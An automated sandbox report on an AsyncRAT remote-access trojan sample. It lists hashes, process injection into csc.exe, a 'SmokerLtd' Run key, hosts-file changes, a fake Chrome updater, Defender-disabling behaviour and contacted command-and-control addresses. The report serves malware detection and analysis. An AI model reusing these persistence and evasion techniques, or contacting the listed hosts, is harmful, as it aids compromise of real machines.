Malware Analysis Report

2024-09-22 07:12

Sample ID 240601-sra71sfd7z
Target SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe
SHA256 b98132aea04a11317b8756786a12f51adbabe38e90d43fdfbc3095e1ad4c4e9a
Tags
asyncrat default persistence rat evasion execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b98132aea04a11317b8756786a12f51adbabe38e90d43fdfbc3095e1ad4c4e9a

Threat Level: Known bad

The file SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default persistence rat evasion execution

AsyncRat

Contains code to disable Windows Defender

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Blocklisted process makes network request

Creates new service(s)

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious use of UnmapMainImage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:21

Reported

2024-06-01 15:23

Platform

win7-20240221-en

Max time kernel

119s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmokerLtd = "C:\\Users\\Admin\\Documents\\Noments\\Toopan.exe" C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2248 set thread context of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

"C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 244

Network

Country Destination Domain Proto
SY 94.232.249.90:8848 tcp
SY 94.232.249.90:8848 tcp
US 8.8.8.8:53 www.darkslain.com udp
US 104.21.37.86:443 www.darkslain.com tcp

Files

memory/2248-0-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2248-1-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2248-2-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2496-3-0x0000000000080000-0x0000000000092000-memory.dmp

memory/2496-5-0x0000000000080000-0x0000000000092000-memory.dmp

memory/2496-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2496-7-0x0000000000080000-0x0000000000092000-memory.dmp

memory/2496-9-0x0000000000080000-0x0000000000092000-memory.dmp

memory/2248-10-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2496-11-0x000000007456E000-0x000000007456F000-memory.dmp

memory/2496-12-0x0000000074560000-0x0000000074C4E000-memory.dmp

memory/2496-30-0x0000000000710000-0x000000000071E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar5A47.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

MD5 093c50edbabb0dab0b39658a6ac83e2d
SHA1 fecfd0c6d525b8060868db0863b23147cd3e8317
SHA256 ea91b53fbe1f61c3d4e619baeeb3dec455db658c1e9c2c43df2a53d6772e81ba
SHA512 264f72b74cd4c97d2180b9830be6fa938bd036acc88b2e5792c26722729aa16bde4131c359743821d2e4712596e5f79d40ce8ff682c3b41223f296205fd419c1

memory/2496-60-0x000000007456E000-0x000000007456F000-memory.dmp

memory/2496-61-0x0000000074560000-0x0000000074C4E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 15:21

Reported

2024-06-01 15:23

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

145s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Windows\SysWOW64\msdr.exe N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokerLtd = "C:\\Users\\Admin\\Documents\\Noments\\Toopan.exe" C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\SysWOW64\msdr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Google\Chrome\updater.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Windows\SysWOW64\msdr.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={71141597-B88E-48A4-AD76-13AD089071B0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 01 Jun 2024 15:22:38 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717255357" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
